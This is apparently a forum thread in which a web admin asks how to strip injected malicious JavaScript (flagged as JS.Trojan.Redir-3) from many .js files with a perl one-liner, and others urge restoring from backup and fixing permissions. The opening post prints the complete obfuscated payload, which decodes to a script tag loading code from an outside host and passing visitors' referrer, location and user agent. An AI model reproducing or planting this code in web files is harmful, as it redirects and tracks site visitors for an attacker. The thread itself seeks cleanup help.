how to remove hacking code from multiple files

Hello,

I've located with clamav multiple .js files infected at the end with the above (JS.Trojan.Redir-3) code

var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29
\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27
\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B
\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63
\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63
\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72
\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D
\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69
\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79
\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C
\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,
_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--)
{_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return 
_0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3])
{_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} 
(_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

I would like to remove all of these with a shell command.

I would use as an example this one :

find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i -0777pe 's|(.*)/\*km0ae9gr6m\*/.*|$1\n|s'

but I'm not sure what to change with all the escape characters and the * symbols.

any help would be appriciated.

Suggestion: if this is java for an application remove the app completely and then re-install. Assuming these are required for some application that users need, you could break the application by trying to uninject code.

If new files just magically appeared then delete the whole files.

However the code got injected, there are some problems on the system with permissions, or someone is surfing the net with privilege, or working on questionable sites. You need to block the behavior or change file permissions that put the code there.

And consider hardening your system.

Yeah, restore from backup or re-install. Would you ever really trust those files again? I wouldn't.

I'm not asking of opinions if I should harden the server or delete the files.
My question is specific about removing specific text into multiple files with shell/script.
maybe the text wouldn't be hack code , maybe it would be a poem, still I want to do the same thing, removing specific text into multiple files with shell/script.

Please accept my sincere apologies for the impetousity of my young and unexperienced colleagues who tried to help you. Of course they were wrong.

To strictly answer your question: use any text-editing tool you like, including (but not limited to): awk, sed, perl, ed, ex, vi, ... All of these tools can be invocated as shell commands.

If you are not sure i suggest you use another tool with which you are. Replace "perl" with "awk", "sed" or any other of the aforementioned text filters until you find one with which you are indeed sure, then use that one. To suggest one would largely be a matter of opinion and you specifically did not ask for that, so i will keep my completely arbitrary personal pejoratives to myself.

I hope this helps.

bakunin

It's "good" to see you have spare time for irony,
it has nothing to do with helping, but ofcourse everyone can post everything he likes.

While posting here in the forum I see

I'm sure they did put it for a reason there,so the replies I got was about the security of the server and not about the correct usage of perl
find /vhosts -type f -name '.js' -print0 | xargs -0 perl -i -0777pe 's|(.*)/\*km0ae9gr6m\*/.|$1\n|s'

I know you got insulted for a reason I cannot explain with my previous post, but my question was specific and I was trying to narrow down the possible answers.

Someone could also reply that I should not use javascript
or that I shouldn't use linux servers,
but that would no help at all, wouldn't it?

If I was sure for another tool or the exact command,
I wouldn't post this,asking for people who know how to use it correctly,
wouldn't I ?

If there was an easy magic do-everything fix for you, we'd give it to you so you could get it fixed and stop insulting us.

It's not "opinion". I've dealt with this before. These kind of malware infections are designed to be difficult to detect and remove. When I ran into a situation like this where the customer had no backups, I wrestled with it for days, but removing the bad parts kept breaking the pages, and it made efforts to put itself back that made everything worse than when I started. I eventually had to track down the original .zip files for the software -- thank goodness the internet is huge, some data-packrat somewhere or other is likely to have anything -- replace everything with a .php extension, and remove everything else newer than 90 days old.

Then afterwards, I secured the permissions properly so it wouldn't happen again...